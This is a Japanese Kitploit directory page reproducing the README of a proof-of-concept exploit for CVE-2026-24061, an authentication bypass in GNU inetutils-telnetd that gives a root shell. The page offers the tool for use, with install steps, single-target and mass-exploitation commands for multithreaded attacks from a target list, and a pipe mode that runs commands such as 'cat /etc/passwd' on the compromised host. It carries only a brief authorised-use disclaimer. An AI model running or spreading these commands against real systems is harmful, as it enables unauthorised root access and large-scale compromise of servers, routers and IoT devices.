Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061-PoC-Exploit — GNU inetutils-telnetd (CVE-2026-24061) 向けのリモート認証バイパスエクスプロイト。CRLFインジェクションを使用して即座にルートシェルを取得します。単一/大量エクスプロイト、マルチスレッド、カスタムポート、パイプモード、セッションキープアライブに対応。 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツールペイロード開発
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

GNU inetutils-telnetd (CVE-2026-24061) 向けのリモート認証バイパスエクスプロイト。CRLFインジェクションを使用して即座にルートシェルを取得します。単一/大量エクスプロイト、マルチスレッド、カスタムポート、パイプモード、セッションキープアライブに対応。

リポジトリを見る
62ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061

🚀 CVE-2026-24061 - GNU inetutils-telnetd 認証バイパスエクスプロイト

Python Bash License CVSS

GNU inetutils-telnetd エディション - CRLF Injection による認証バイパス & 即時ルートシェル

📌 概要

このエクスプロイトは、CVE-2026-24061(GNU inetutils-telnetd の重要なリモート認証バイパス脆弱性)を利用します。USER='-f root' を含む細工された NEW_ENVIRON ペイロードを注入することで、認証をバイパスし、認証情報なしで即座にルートシェルを取得します。

注: basic_exploit.sh スクリプトは exploit.sh の簡略化された高速バージョンですが、完全な機能を利用するには exploit.sh が推奨されます。

🔥 主な機能

🎯 脆弱なバージョン

製品バージョン
GNU inetutils-telnetd1.9.3 - 2.7
影響を受ける Linux ディストリビューションDebian, CentOS, Ubuntu およびその派生ディストリビューション (Zorin OS, Linux Mint, Pop!_OS, Elementary OS)
組み込みデバイスNAS, IoT, ルーター

⚠️ 免責事項: このツールは認可されたセキュリティテストおよび教育目的のみに使用されます。無許可のアクセスは違法です。

📦 インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ 使用例

🎯 単一ターゲットのエクスプロイト

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 カスタムポートとユーザー

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 大量エクスプロイト (複数ターゲット)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 パイプモード (コマンド実行)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ 詳細オプション

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 コマンドライン引数

🔗 関連エクスプロイト

他のエクスプロイトリポジトリもご覧ください:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
ツールをダウンロード
カテゴリ機能
エクスプロイト✅ CRLF Injection による認証バイパス
✅ 即時ルートシェル
✅ カスタムユーザー注入 (-f admin, -f user)
スキャン✅ 単一ターゲットのエクスプロイト
✅ ファイルからの大量エクスプロイト
✅ マルチスレッド (設定可能なスレッド数)
✅ カスタムポートサポート
高度✅ パイプモード (stdin 経由のコマンド実行)
✅ セッションキープアライブ
✅ リトライ機構
✅ タイムアウト制御
ユーザビリティ✅ 色付き出力 (colorama)
✅ デュアル言語 (Python & Bash)
✅ 冗長/デバッグモード
短縮長い説明デフォルト
-u--urlターゲットIPアドレス必須
-p--portターゲットポート23
-l--listターゲットリストを含むファイルNone
-m--max-threads大量エクスプロイトの最大スレッド数10
-usr--username注入するユーザー名root
-t--timeoutソケットタイムアウト (秒)10
-r--retriesリトライ回数3
-v--verboseデバッグ出力を有効化False
--keep-aliveエクスプロイト後にセッションを維持False